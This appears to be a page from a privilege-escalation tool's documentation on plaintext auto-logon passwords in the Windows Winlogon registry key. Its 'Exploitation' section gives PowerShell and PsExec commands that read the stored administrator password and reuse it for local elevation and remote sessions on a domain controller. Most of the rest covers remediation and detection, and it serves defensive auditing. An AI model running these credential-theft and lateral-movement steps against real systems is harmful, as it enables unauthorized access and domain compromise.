Overview The Registry AutoLogons check searches for plaintext credentials stored in the Windows registry for automatic logon functionality. When auto-logon is configured, Windows stores the username and password in plaintext in the registry, accessible to any user who can read the registry.
These credentials are stored in PLAINTEXT and readable by all users on the system.
How It Works SharpUp checks the Winlogon registry key for auto-logon configuration:
HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Registry Values Checked:
AutoAdminLogon - Must be set to “1”DefaultUserName - Username for auto-logonDefaultPassword - Plaintext passwordDefaultDomainName - Domain nameAltDefaultUserName - Alternative usernameAltDefaultPassword - Alternative passwordAltDefaultDomainName - Alternative domain
Example Output Registry AutoLogon Found === Registry AutoLogons === DefaultDomainName: CONTOSO DefaultUserName: Administrator DefaultPassword: P@ssw0rd123! AltDefaultDomainName: AltDefaultUserName: AltDefaultPassword: Interpretation:
Auto-logon is enabled
Administrator account credentials are stored in plaintext
Domain is CONTOSO
These credentials can be used immediately for privilege escalation
Exploitation Method 1: Direct Credential Read # Read credentials from registry $winlogon = "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" $autoLogon = Get-ItemProperty - Path $winlogon - Name "AutoAdminLogon" - ErrorAction SilentlyContinue $username = Get-ItemProperty - Path $winlogon - Name "DefaultUserName" - ErrorAction SilentlyContinue $password = Get-ItemProperty - Path $winlogon - Name "DefaultPassword" - ErrorAction SilentlyContinue $domain = Get-ItemProperty - Path $winlogon - Name "DefaultDomainName" - ErrorAction SilentlyContinue if ( $autoLogon .AutoAdminLogon -eq "1" ) { Write-Host "[+] Auto-Logon Enabled" Write-Host " Domain: $( $domain .DefaultDomainName ) " Write-Host " Username: $( $username .DefaultUserName ) " Write-Host " Password: $( $password .DefaultPassword ) " } Method 2: Use Credentials with RunAs # Use discovered credentials $username = "CONTOSO\Administrator" $password = "P@ssw0rd123!" | ConvertTo-SecureString - AsPlainText - Force $cred = New-Object System.Management.Automation.PSCredential( $username , $password ) # Execute command as that user Start-Process powershell.exe - Credential $cred - ArgumentList "-NoExit" , "-Command" , "whoami" Method 3: PSExec with Credentials # Use discovered credentials with PSExec psexec. exe \\ localhost - u CONTOSO \ Administrator - p P@ssw0rd123 ! cmd.exe Method 4: Remote Authentication # Use credentials to authenticate to other systems $pass = ConvertTo-SecureString "P@ssw0rd123!" - AsPlainText - Force $cred = New-Object System.Management.Automation.PSCredential( "CONTOSO\Administrator" , $pass ) # Access remote system Enter-PSSession - ComputerName DC01 - Credential $cred # Or invoke commands Invoke-Command - ComputerName DC01 - Credential $cred - ScriptBlock { whoami; ipconfig }
Disable Auto-Logon
# Disable auto-logon Set-ItemProperty - Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" ` - Name "AutoAdminLogon" ` - Value "0" # Remove stored password Remove-ItemProperty - Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" ` - Name "DefaultPassword" ` - ErrorAction SilentlyContinue Remove-ItemProperty - Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" ` - Name "AltDefaultPassword" ` - ErrorAction SilentlyContinue Write-Host "[+] Auto-logon disabled and passwords removed"
Change Exposed Password
# Change password for the exposed account net user Administrator "NewComplexP@ssw0rd123!" # Or for domain account Set-ADAccountPassword - Identity Administrator - Reset - NewPassword ( ConvertTo-SecureString - AsPlainText "NewP@ssw0rd!" - Force)
Use Alternative Auto-Logon Solutions
If auto-logon is required:
Autologon.exe from Sysinternals - Encrypts credentials using LSA secretsWindows Credential Manager - More secure credential storageSmart Card authentication - Hardware-based authenticationWindows Hello - Biometric authentication
Verify Removal
# Re-run check SharpUp.exe RegistryAutoLogons Should return no results. Detection Defensive Monitoring # Monitor registry changes to Winlogon $registryPath = "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" # Enable auditing $acl = Get-Acl $registryPath $auditRule = New-Object System.Security.AccessControl.RegistryAuditRule( "Everyone" , "SetValue" , "None" , "None" , "Success" ) $acl .AddAuditRule ( $auditRule ) Set-Acl $registryPath $acl # Monitor Event ID 4657 for registry modifications Get-WinEvent - FilterHashtable @ { LogName = 'Security' ; ID = 4657 } | Where-Object { $_ .Message -match 'Winlogon.*DefaultPassword' } Detection Strategies Registry Monitoring
Credential Usage
Configuration Auditing
Monitor Winlogon registry key for changes
Alert when AutoAdminLogon is set to 1
Detect DefaultPassword value creation
Track who reads these registry values
Real-World Scenarios
Context: Public kiosk system configured with auto-logon for convenience. Administrator credentials used.Risk:
Anyone can read registry and obtain administrator password
Password likely reused across all kiosks
Complete compromise of kiosk infrastructure
Solution:
Use dedicated kiosk account with minimal privileges
Enable Assigned Access (kiosk mode)
Don’t use administrator accounts
Rotate credentials regularly
Scenario 2: Server Auto-Restart
Context: Server configured to auto-logon after reboot to start applications automatically.Impact:
Service account credentials in plaintext
Credentials may have broad access
Enables lateral movement
Solution:
Use Windows Services instead of interactive logon
Implement gMSA or sMSA
Use scheduled tasks with proper credential storage
Scenario 3: Penetration Test
Context: Gained access as low-privileged user on workstation.Attack Path:
Run SharpUp to discover auto-logon credentials
Find Domain Admin credentials in registry
Use credentials to access domain controller
Complete domain compromise
Prevention Best Practices
Never Use Auto-Logon Avoid auto-logon in enterprise environments. It’s inherently insecure.
Minimal Privilege Accounts If auto-logon is necessary, use accounts with minimal privileges.
Use Services Use Windows Services or Scheduled Tasks instead of interactive logon.
Regular Audits Regularly scan for auto-logon configurations across all systems.
Automated Detection Script # Scan all computers in domain for auto-logon $computers = Get-ADComputer - Filter * | Select-Object - ExpandProperty Name $results = foreach ( $computer in $computers ) { try { $reg = [ Microsoft.Win32.RegistryKey ]::OpenRemoteBaseKey( 'LocalMachine' , $computer ) $key = $reg .OpenSubKey ( "Software\Microsoft\Windows NT\CurrentVersion\Winlogon" ) $autoLogon = $key .GetValue ( "AutoAdminLogon" ) if ( $autoLogon -eq "1" ) { [ PSCustomObject ] @ { ComputerName = $computer AutoLogon = $autoLogon Username = $key .GetValue ( "DefaultUserName" ) Domain = $key .GetValue ( "DefaultDomainName" ) PasswordStored = ( $key .GetValue ( "DefaultPassword" ) -ne $null ) } } } catch { Write-Warning "Cannot access $computer " } } if ( $results ) { $results | Export-Csv "AutoLogonSystems_ $( Get-Date - Format yyyyMMdd ) .csv" - NoTypeInformation Send-MailMessage - To "security@company.com" - Subject "Auto-Logon Systems Found" - Body "See attached" - Attachments "AutoLogonSystems_ $( Get-Date - Format yyyyMMdd ) .csv" } References 
